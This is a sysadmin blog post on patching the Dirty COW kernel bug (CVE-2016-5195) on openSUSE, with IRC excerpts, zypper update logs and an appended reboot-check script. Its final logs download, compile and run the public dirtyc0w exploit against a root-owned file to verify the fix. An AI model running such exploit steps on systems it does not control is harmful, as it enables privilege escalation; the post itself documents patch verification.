How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ]
Posted by jpluimers on 2016/10/21
There is a nasty Linux kernel bug (Dirty COW: CVE-2016-5195) with zero-day exploits floating around.
openSUSE updates will be available soon (likely this weekend); from the #openSUSE-factory IRC channel:
wiert: any E.T.A. for CVE-2016-5195 in the various releases?
…_Marcus_: 13.1 and 42.1 i just released. 13.2 submission i am still awaiting, so release likely tomorrow
…wiert: How about Tumbleweed?
…DimStar: for TW, I have it in staging and will try to squeeze it into the 1021 snapshot
so unlike something really bad happened, it should be shipping tomorrow or Sunday
via: How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ] [WayBack]
Progress can be tracked at https://bugzilla.suse.com/show_bug.cgi?id=CVE-2016-5195 (via simotek a.k.a. Simon Lees at IRC). Hopefully 13.2 will get released on Monday.
Edit: 13.2 didn’t make it on Monday. Progress can be found via https://build.opensuse.org/project/maintenance_incidents/openSUSE:Maintenance (slow loading page!) and is at https://build.opensuse.org/project/show/openSUSE:Maintenance:5752
More exploits at https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
–jeroen
Testing 13.2:
```
# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
# zypper patch
```
This works fine while waiting for the formal update process, and my testing it resulted in the release of the kernel to the official 13.2 update. Note that you still have to reboot after the update, even though the process doesn’t tell you that:
wiert: @_Marcus_ “klopt als een zwerende vinger” or in English: works splendid. install and test log at https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e
wiert: @_Marcus_ thanks about teaching me about `zypper patch`. Need to run for the fundraising event now.
_Marcus_: wiert: thanks :)
wiert: @_Marcus_ no problem. Given the work you guys (and gals?) do it’s a small thing with the added bonus of contributing to my motto “life is about learning new things every day”.
_Marcus_: after your feedback i have now released the kernel ;)
wiert: @_Marcus_ great, looking forward to the actual update later. Thanks a lot!
wiert: @_Marcus_ I’ve updated the gist: 13.2 plus official dirty-COW update needs reboot, but the update process doesn’t list about reboot. Didn’t get the full zypper output, but after updating I did a before/after reboot comparison of the behaviour. Results in https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e#file-testing-official-update-before-reboot-then-reboot-retest-txt
```
# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
Adding repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' ....................[done]
Repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' successfully added
Enabled : Yes
Autorefresh : No
GPG Check : Yes
URI : http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/
# zypper patch
New repository or package signing key received:
Repository: openSUSE:Maintenance:5752 (openSUSE_13.2_Update)
Key Name: openSUSE:Maintenance OBS Project <openSUSE:Maintenance@build.opensuse.org>
Key Fingerprint: 7C097045 B0D351D3 69AC453A 598D0E63 B3FD7E48
Key Created: Thu Aug 6 11:49:53 2015
Key Expires: Sat Oct 14 11:49:53 2017
Rpm Name: gpg-pubkey-b3fd7e48-55c32dc1
Do you want to reject the key, trust temporarily, or trust always? [r/t/a/? shows all options] (r): t
Building repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' cache ....................[done]
Loading repository data...
Reading installed packages...
Resolving package dependencies...
The following NEW package is going to be installed:
kernel-default-3.16.7-45.1
The following NEW patch is going to be installed:
5752
1 new package to install.
Overall download size: 45.2 MiB. Already cached: 0 B After the operation, additional 213.5 MiB will be used.
Continue? [y/n/? shows all options] (y): y
Retrieving package kernel-default-3.16.7-45.1.x86_64 (1/1), 45.2 MiB (213.5 MiB unpacked)
Retrieving: kernel-default-3.16.7-45.1.x86_64.rpm ....................[done (3.6 MiB/s)]
Checking for file conflicts: ....................[done]
(1/1) Installing: kernel-default-3.16.7-45.1 ....................[done]
Additional rpm output:
warning: /var/cache/zypp/packages/openSUSE_Maintenance_5752/x86_64/kernel-default-3.16.7-45.1.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID b3fd7e48: NOKEY
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut --logfile /var/log/YaST2/mkinitrd.log --force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader...
Warning: One of installed patches requires reboot of your machine. Reboot as soon as possible.
# reboot
```
```
(1/3) Installing: kernel-default-3.16.7-45.1 ....................[done]
Additional rpm output:
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut --logfile /var/log/YaST2/mkinitrd.log --force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader...
(2/3) Installing: ghostscript-9.15-6.1 ....................[done]
(3/3) Installing: ghostscript-x11-9.15-6.1 ....................[done]
```
```
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su -
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap ffffffffffffffff
madvise -100000000
procselfmem -100000000
$ cat foo
cat: foo: No such file or directory
$ sudo su -
# cat foo
this is not a test
# logout
```
```
$ cd /tmp/
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su -
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f6ab7207000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
$ sudo su -
# reboot
login
$ cd /tmp/
$ sudo su -
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f5465983000
madvise 0
procselfmem 1800000000
$ cat foo
this is not a test
```
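
The before/after-reboot difference shown above can be checked mechanically: a patched kernel on disk protects nothing until it is the one running. The script below is an added example, not part of the original post or gist. The function names are illustrative, `3.16.7-42-default` is a constructed "previous" release, and it assumes GNU `sort -V` and one `/lib/modules/<release>` directory per installed kernel.

```shell
#!/bin/sh
# Added example (not from the original post): report when a patched kernel is
# installed on disk but the machine is still running the old, vulnerable one.

# Print the newest release of one flavor (e.g. "default") from a
# newline-separated list of kernel releases. Assumes `sort -V` (GNU coreutils).
newest_for_flavor() {
    printf '%s\n' "$2" | grep -- "-$1\$" | sort -V | tail -n 1
}

# Exit status 0 when a newer kernel of the running flavor is installed,
# i.e. a reboot is still required. $1 = running release, $2 = installed list.
reboot_needed() {
    running=$1
    flavor=${running##*-}
    newest=$(newest_for_flavor "$flavor" "$2")
    [ -n "$newest" ] || return 1            # nothing installed for this flavor
    [ "$newest" != "$running" ] || return 1 # already running the newest one
    # The newest installed release must sort after the running one.
    last=$(printf '%s\n%s\n' "$running" "$newest" | sort -V | tail -n 1)
    [ "$last" = "$newest" ]
}

# Human-readable verdict for logs or monitoring.
kernel_status() {
    if reboot_needed "$1" "$2"; then
        echo "REBOOT NEEDED: running $1, newer kernel installed"
    else
        echo "OK: no newer kernel than $1 installed"
    fi
}

# Constructed sample: 3.16.7-45-default is the fixed kernel from the log above;
# 3.16.7-42-default is a made-up "previous" release used for illustration.
SAMPLE_INSTALLED='3.16.7-42-default
3.16.7-45-default'
kernel_status "3.16.7-42-default" "$SAMPLE_INSTALLED"

# On a live system (assumes one /lib/modules/<release> directory per kernel):
#   kernel_status "$(uname -r)" "$(ls /lib/modules)"
```
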





